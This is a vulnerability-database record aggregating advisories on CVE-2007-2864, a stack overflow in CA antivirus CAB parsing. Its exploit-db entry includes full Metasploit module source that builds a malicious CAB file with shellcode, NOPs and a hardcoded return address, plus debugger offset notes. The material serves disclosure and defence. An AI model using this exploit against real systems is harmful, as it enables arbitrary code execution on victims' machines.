{"id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/CA_CAB", "type": "metasploit", "bulletinFamily": "exploit", "title": "CA Antivirus Engine CAB Buffer Overflow", "description": "This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637. By creating a specially crafted CAB file, an attacker may be able to execute arbitrary code.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864"], "cvelist": ["CVE-2007-2864"], "lastseen": "2020-10-06T05:32:30", "viewCount": 18, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2020-10-06T05:32:30", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2864"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83164"]}, {"type": "osvdb", "idList": ["OSVDB:35245"]}, {"type": "saint", "idList": ["SAINT:B33B0E8F384AB4799CD68321286D6D61", "SAINT:EF8B495EDB655777167BAB3F8CBF1A4F", "SAINT:E614102879067571BD9A344FA4F0BCAA"]}, {"type": "zdi", "idList": ["ZDI-07-035"]}, {"type": "exploitdb", "idList": ["EDB-ID:16677"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7784", "SECURITYVULNS:DOC:17202", "SECURITYVULNS:DOC:17209"]}, {"type": "cert", "idList": ["VU:105105"]}], "modified": "2020-10-06T05:32:30", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/ca_cab.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}

{"cve": [{"lastseen": "2021-02-02T05:31:24", "description": "Stack-based buffer overflow in the Anti-Virus engine before content update 30.6 in multiple CA (formerly Computer Associates) products allows remote attackers to execute arbitrary code via a large invalid value of the coffFiles field in a .CAB file.", "edition": 4, "cvss3": {}, "published": "2007-06-06T21:30:00", "title": "CVE-2007-2864", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2864"], "modified": "2018-10-16T16:45:00", "cpe": ["cpe:/a:ca:common_services:2.0", "cpe:/a:ca:brightstor_arcserve_backup:11.1", "cpe:/a:ca:internet_security_suite:2.0", "cpe:/a:ca:brightstor_arcserve_backup:10.5", "cpe:/a:ca:integrated_threat_management:8.0", "cpe:/a:ca:etrust_ez_armor:2.0", "cpe:/a:ca:etrust_antivirus:8.0", "cpe:/a:ca:etrust_ez_antivirus:7.0", "cpe:/a:ca:unicenter_network_and_systems_management:3.0", "cpe:/a:ca:anti-virus_for_the_enterprise:8", "cpe:/a:ca:etrust_ez_armor:3.0", "cpe:/a:ca:unicenter_network_and_systems_management:11", "cpe:/a:ca:common_services:1.1", "cpe:/a:ca:etrust_ez_antivirus:6.1", "cpe:/a:ca:brightstor_arcserve_backup:11.5", "cpe:/a:ca:etrust_ez_armor:3.1", "cpe:/a:ca:common_services:1.0", "cpe:/a:ca:brightstor_arcserve_backup:9.01", "cpe:/a:ca:etrust_antivirus_gateway:7.1", "cpe:/a:ca:internet_security_suite:1.0", "cpe:/a:ca:common_services:2.2", "cpe:/a:ca:protection_suites:r2", "cpe:/a:ca:etrust_antivirus_sdk:*", "cpe:/a:ca:etrust_antivirus:8.1", "cpe:/a:ca:etrust_secure_content_manager:8.0", "cpe:/a:ca:internet_security_suite:3.0", "cpe:/a:ca:etrust_ez_armor:1.0", "cpe:/a:ca:common_services:3.0", "cpe:/a:ca:unicenter_network_and_systems_management:3.1", "cpe:/a:ca:brightstor_arcserve_backup:11", "cpe:/a:ca:common_services:2.1", "cpe:/a:ca:unicenter_network_and_systems_management:11.1", "cpe:/a:ca:protection_suites:r3"], "id": "CVE-2007-2864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2864", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ca:brightstor_arcserve_backup:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:protection_suites:r2:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:unicenter_network_and_systems_management:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:unicenter_network_and_systems_management:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_armor:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:internet_security_suite:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_antivirus:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_armor:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_antivirus:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_antivirus:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:protection_suites:r3:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_antivirus_sdk:*:*:*:*:*:*:*:*", "cpe:2.3:a:ca:anti-virus_for_the_enterprise:8:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:unicenter_network_and_systems_management:11:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:11:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:internet_security_suite:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:internet_security_suite:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_armor:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_secure_content_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:integrated_threat_management:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:unicenter_network_and_systems_management:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_armor:3.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "description": "Added: 06/07/2007 \nCVE: [CVE-2007-2864](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864>) \nBID: [24330](<http://www.securityfocus.com/bid/24330>) \nOSVDB: [35245](<http://www.osvdb.org/35245>) \n\n\n### Background\n\nThe CA Antivirus engine is included in multiple CA products. \n\n### Problem\n\nA buffer overflow vulnerability in the CA Antivirus engine allows command execution when a CAB file containing a specially crafted \"coffFiles\" field is scanned. \n\n### Resolution\n\nApply content update 30.6 as described in the [CA Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-07-035.html> \n\n\n### Limitations\n\nExploit works on CA eTrust Antivirus 8.1.637 and requires a user to download and open the exploit file. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-06-07T00:00:00", "published": "2007-06-07T00:00:00", "id": "SAINT:EF8B495EDB655777167BAB3F8CBF1A4F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ca_antivirus_cab", "type": "saint", "title": "CA Antivirus engine CAB handling buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:50", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "edition": 2, "description": "Added: 06/07/2007 \nCVE: [CVE-2007-2864](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864>) \nBID: [24330](<http://www.securityfocus.com/bid/24330>) \nOSVDB: [35245](<http://www.osvdb.org/35245>) \n\n\n### Background\n\nThe CA Antivirus engine is included in multiple CA products. \n\n### Problem\n\nA buffer overflow vulnerability in the CA Antivirus engine allows command execution when a CAB file containing a specially crafted \"coffFiles\" field is scanned. \n\n### Resolution\n\nApply content update 30.6 as described in the [CA Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-07-035.html> \n\n\n### Limitations\n\nExploit works on CA eTrust Antivirus 8.1.637 and requires a user to download and open the exploit file. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-06-07T00:00:00", "published": "2007-06-07T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ca_antivirus_cab", "id": "SAINT:E614102879067571BD9A344FA4F0BCAA", "title": "CA Antivirus engine CAB handling buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "description": "Added: 06/07/2007 \nCVE: [CVE-2007-2864](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864>) \nBID: [24330](<http://www.securityfocus.com/bid/24330>) \nOSVDB: [35245](<http://www.osvdb.org/35245>) \n\n\n### Background\n\nThe CA Antivirus engine is included in multiple CA products. \n\n### Problem\n\nA buffer overflow vulnerability in the CA Antivirus engine allows command execution when a CAB file containing a specially crafted \"coffFiles\" field is scanned. \n\n### Resolution\n\nApply content update 30.6 as described in the [CA Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-07-035.html> \n\n\n### Limitations\n\nExploit works on CA eTrust Antivirus 8.1.637 and requires a user to download and open the exploit file. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2007-06-07T00:00:00", "published": "2007-06-07T00:00:00", "id": "SAINT:B33B0E8F384AB4799CD68321286D6D61", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ca_antivirus_cab", "title": "CA Antivirus engine CAB handling buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "cvelist": ["CVE-2007-2864"], "description": "## Vulnerability Description\nA buffer overflow exists in multiple CA products. The Anti-Virus engine fails to validate CAB files resulting in a stack overflow. With a specially crafted CAB file containing a malformed \"coffFiles\" field, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, CA has released a patch to address this vulnerability.\n## Short Description\nA buffer overflow exists in multiple CA products. The Anti-Virus engine fails to validate CAB files resulting in a stack overflow. With a specially crafted CAB file containing a malformed \"coffFiles\" field, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp)\nSecurity Tracker: 1018199\n[Secunia Advisory ID:25570](https://secuniaresearch.flexerasoftware.com/advisories/25570/)\n[Related OSVDB ID: 35244](https://vulners.com/osvdb/OSVDB:35244)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-07-035.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0060.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0148.html\nISS X-Force ID: 34737\nFrSIRT Advisory: ADV-2007-2072\n[CVE-2007-2864](https://vulners.com/cve/CVE-2007-2864)\nCERT VU: 105105\nBugtraq ID: 214330\n", "edition": 1, "modified": "2007-06-05T12:33:49", "published": "2007-06-05T12:33:49", "href": "https://vulners.com/osvdb/OSVDB:35245", "id": "OSVDB:35245", "title": "CA Anti-Virus Engine CAB Header Parsing Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:14:51", "description": "CA Antivirus Engine CAB Buffer Overflow. CVE-2007-2864. Local exploit for windows platform", "published": "2010-11-11T00:00:00", "type": "exploitdb", "title": "CA Antivirus Engine CAB Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "modified": "2010-11-11T00:00:00", "id": "EDB-ID:16677", "href": "https://www.exploit-db.com/exploits/16677/", "sourceData": "##\r\n# $Id: ca_cab.rb 10998 2010-11-11 22:43:22Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA Antivirus Engine CAB Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\r\n\t\t\t\t\tBy creating a specially crafted CAB file, an an attacker may be able\r\n\t\t\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 10998 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-2864' ],\r\n\t\t\t\t\t[ 'OSVDB', '35245'],\r\n\t\t\t\t\t[ 'BID', '24330' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-035.html' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 250,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)', { 'Ret' => 0x6dc886ea } ], # inocore.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jun 05 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ false, 'The file name.', 'msf.cab']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tcab_header = \"\\x4D\\x53\\x43\\x46\\x00\\x00\\x00\\x00\\xC4\\x0D\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tcab_header << \"\\x2C\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x01\\x01\\x00\\x01\\x00\\x00\\x00\"\r\n\t\tcab_header << \"\\xD2\\x04\\x00\\x00\\x44\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x78\\x0D\\x00\\x00\"\r\n\t\tcab_header << \"\\x00\\x00\\x00\\x00\\x00\\x00\\xE2\\x36\\x53\\xAD\\x20\\x00\"\r\n\r\n\t\tsploit = make_nops(268 - payload.encoded.length) + payload.encoded\r\n\t\tsploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')\r\n\t\tsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-260\").encode_string\r\n\t\tsploit << make_nops(800)\r\n\r\n\t\tcab = cab_header + sploit\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(cab)\r\n\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n0:001> !exchain\r\n00cdf1b0: VetE!InoAvpackDat+ca058 (600d19c8)\r\n00cdf2fc: 316a4130\r\nInvalid exception stack at 6a413969\r\n0:001> !pattern_offset 1024 0x6a413969\r\n[Byakugan] Control of 0x6a413969 at offset 268.\r\n0:001> !pattern_offset 1024 0x316a4130\r\n[Byakugan] Control of 0x316a4130 at offset 272.\r\n0:001> u 0x6dc886ea L3\r\nINOCORE!QSIInitQSysInfo+0x278a:\r\n6dc886ea 5f pop edi\r\n6dc886eb 5e pop esi\r\n6dc886ec c3 ret\r\n=end\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16677/"}], "zdi": [{"lastseen": "2020-06-22T11:41:31", "bulletinFamily": "info", "cvelist": ["CVE-2007-2864"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code onvulnerable installations of various Computer Associates products. The specific flaw exists within the processing of an improperly defined \"coffFiles\" field in .CAB archives. Large values result in an unbounded data copy operation which can result in an exploitable stack-based buffer overflow.", "modified": "2007-06-22T00:00:00", "published": "2007-06-05T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-07-035/", "id": "ZDI-07-035", "title": "CA Multiple Product AV Engine CAB Header Parsing Stack Overflow Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:36", "bulletinFamily": "info", "cvelist": ["CVE-2007-2864"], "description": "### Overview \n\nThe Computer Associates Anti-Virus engine contains a stack-based buffer overflow that may allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description \n\nThe Computer Associates Anti-Virus engine contains a stack-based buffer overflow in the code responsible for processing CAB archives. Specifically, the Computer Associates Anti-Virus engine fails to properly validate the size of the `coffFiles` field in CAB archives before it is copied to a stack buffer. This may allow a stack-based buffer overflow to occur. \n\nThis vulnerability affects numerous Computer Associates products, including: \n\n\n * CA Anti-Virus\n * eTrust EZ Antivirus\n * CA Internet Security Suite 2007\n * eTrust Internet Security Suite\n * eTrust EZ Armor\n * CA Threat Manager\n * CA Protection Suites\n * CA Secure Content Manager\n * CA Anti-Virus Gateway\n * Unicenter Network and Systems Management\n * BrightStor ARCserve Backup\n * CA Common Services\n * CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\nMore information is available in the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>) issued June 5th, 2007. \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code or cause a denial-of-service condition.. \n \n--- \n \n### Solution \n\n**Apply an Update**\n\nAccording to the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>) issued June 5th, 2007: \n \n_CA has issued content update 30.6 to address the vulnerabilities. The updated engine is provided with content updates. Ensure the latest content update is installed if the signature version is less than version 30.6._ \n \n--- \n \n### Vendor Information\n\n105105\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: June 06, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23105105 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>\n * <http://www.zerodayinitiative.com/advisories/ZDI-07-035.html>\n * <http://secunia.com/advisories/25570/>\n\n### Acknowledgements\n\nThis vulnerability was reported by in Tipping Point advisory ZDI-07-035.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-2864](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-2864>) \n---|--- \n**Severity Metric:** | 15.19 \n**Date Public:** | 2007-06-05 \n**Date First Published:** | 2007-06-06 \n**Date Last Updated: ** | 2007-06-06 19:57 UTC \n**Document Revision: ** | 12 \n", "modified": "2007-06-06T19:57:00", "published": "2007-06-06T00:00:00", "id": "VU:105105", "href": "https://www.kb.cert.org/vuls/id/105105", "type": "cert", "title": "Computer Associates Anti-Virus engine fails to properly handle malformed CAB archives", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-2864"], "description": "ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack\r\n Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-035.html\r\nJune 5, 2007\r\n\r\n-- CVE ID:\r\nCVE-2007-2864\r\n\r\n-- Affected Vendor:\r\nComputer Associates\r\n\r\n-- Affected Products:\r\nCA Anti-Virus\r\neTrust EZ Antivirus\r\nCA Internet Security Suite 2007\r\neTrust Internet Security Suite\r\neTrust EZ Armor\r\nCA Threat Manager\r\nCA Protection Suites\r\nCA Secure Content Manager\r\nCA Anti-Virus Gateway\r\nUnicenter Network and Systems Management\r\nBrightStor ARCserve Backup\r\nCA Common Services\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of various Computer Associates products.\r\n\r\nThe specific flaw exists within the processing of an improperly defined\r\n&quot;coffFiles&quot; field in .CAB archives. Large values result in an unbounded\r\ndata copy operation which can result in an exploitable stack-based\r\nbuffer overflow.\r\n\r\n-- Vendor Response:\r\nComputer Associates has issued an update to correct this vulnerability.\r\nMore details can be found at:\r\n \r\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp\r\n\r\n-- Disclosure Timeline:\r\n2007.02.16 - Vulnerability reported to vendor\r\n2007.06.05 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by an anonymous researcher.\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n&#40;ZDI&#41; represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors &#40;including competitors&#41;\r\nwho have a vulnerability protection or mitigation product.\r\n\r\n\r\nCONFIDENTIALITY NOTICE: This e-mail message, including any attachments,\r\nis being sent by 3Com for the sole use of the intended recipient&#40;s&#41; and\r\nmay contain confidential, proprietary and/or privileged information.\r\nAny unauthorized review, use, disclosure and/or distribution by any \r\nrecipient is prohibited. If you are not the intended recipient, please\r\ndelete and/or destroy all copies of this message regardless of form and\r\nany included attachments and notify 3Com immediately by contacting the\r\nsender via reply e-mail or forwarding to 3Com at postmaster@3com.com. ", "edition": 1, "modified": "2007-06-06T00:00:00", "published": "2007-06-06T00:00:00", "id": "SECURITYVULNS:DOC:17202", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17202", "title": "ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "cvelist": ["CVE-2007-2864", "CVE-2007-2863"], "description": "Buffer overflow on CAB archives parsing.", "edition": 1, "modified": "2007-06-11T00:00:00", "published": "2007-06-11T00:00:00", "id": "SECURITYVULNS:VULN:7784", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7784", "title": "CA multiple antiviral products buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-2864", "CVE-2007-2863"], "description": "\r\nTitle: [CAID 35395, 35396]: CA Anti-Virus Engine CAB File Buffer \r\nOverflow Vulnerabilities\r\n\r\nCA Vuln ID &#40;CAID&#41;: 35395, 35396\r\n\r\nCA Advisory Date: 2007-06-05\r\n\r\nReported By: ZDI\r\n\r\nImpact: Remote attackers can cause a denial of service or \r\npotentially execute arbitrary code.\r\n\r\nSummary: CA Anti-Virus engine contains multiple vulnerabilities \r\nthat can allow a remote attacker to cause a denial of service or \r\npossibly execute arbitrary code. CA has issued an update to \r\naddress the vulnerabilities. The first vulnerability, \r\nCVE-2007-2863, is due to insufficient bounds checking on filenames \r\ncontained in a CAB archive. The second vulnerability, \r\nCVE-2007-2863, is due to insufficient bounds checking on the \r\n&quot;coffFiles&quot; field. By using a specially malformed CAB file, an \r\nattacker can cause a crash or take unauthorized action on an \r\naffected system.\r\n\r\nMitigating Factors: None\r\n\r\nSeverity: CA has given these vulnerabilities a High risk rating.\r\n\r\nAffected Products:\r\nCA Anti-Virus for the Enterprise &#40;formerly eTrust Antivirus&#41; r8, \r\n r8.1\r\nCA Anti-Virus 2007 &#40;v8&#41;\r\neTrust EZ Antivirus r7, r6.1\r\nCA Internet Security Suite 2007 &#40;v3&#41;\r\neTrust Internet Security Suite r1, r2\r\neTrust EZ Armor r1, r2, r3.x\r\nCA Threat Manager for the Enterprise &#40;formerly eTrust Integrated \r\n Threat Management&#41; r8\r\nCA Protection Suites r2, r3\r\nCA Secure Content Manager &#40;formerly eTrust Secure Content \r\n Manager&#41; 8.0\r\nCA Anti-Virus Gateway &#40;formerly eTrust Antivirus eTrust Antivirus \r\n Gateway&#41; 7.1\r\nUnicenter Network and Systems Management &#40;NSM&#41; r3.0\r\nUnicenter Network and Systems Management &#40;NSM&#41; r3.1\r\nUnicenter Network and Systems Management &#40;NSM&#41; r11\r\nUnicenter Network and Systems Management &#40;NSM&#41; r11.1\r\nBrightStor ARCserve Backup r11.5\r\nBrightStor ARCserve Backup r11.1\r\nBrightStor ARCserve Backup r11 for Windows\r\nBrightStor Enterprise Backup r10.5\r\nBrightStor ARCserve Backup v9.01\r\nCA Common Services\r\nCA Anti-Virus SDK &#40;formerly eTrust Anti-Virus SDK&#41;\r\n\r\nAffected Platforms:\r\nAll\r\n\r\nStatus and Recommendation:\r\nCA has issued content update 30.6 to address the vulnerabilities. \r\nThe updated engine is provided with content updates. Ensure the \r\nlatest content update is installed if the signature version is \r\nless than version 30.6.\r\n\r\nFor BrightStor ARCserve Backup:\r\n\r\n1. To update the signatures one time only, open a command window, \r\nchange into the &quot;C:&#92;Program Files&#92;CA&#92;SharedComponents&#92;ScanEngine&quot; \r\ndirectory, and enter the following command:\r\n\r\ninodist /cfg inodist.ini\r\n\r\n2. To update on a regular schedule:\r\n\r\n* Submit a GenericJob using the ARCserve Job Scheduler. Please \r\nsearch the BrightStor Administrator&#39;s Guide for &#39;Antivirus \r\nMaintenance&#39; and follow the directions.\r\n\r\nOr\r\n\r\n* Use the above command line instruction with the AT Scheduler.\r\n\r\n\r\nWorkaround: None\r\n\r\nReferences &#40;URLs may wrap&#41;:\r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA SupportConnect Security Notice for this vulnerability:\r\nSecurity Notice for CA 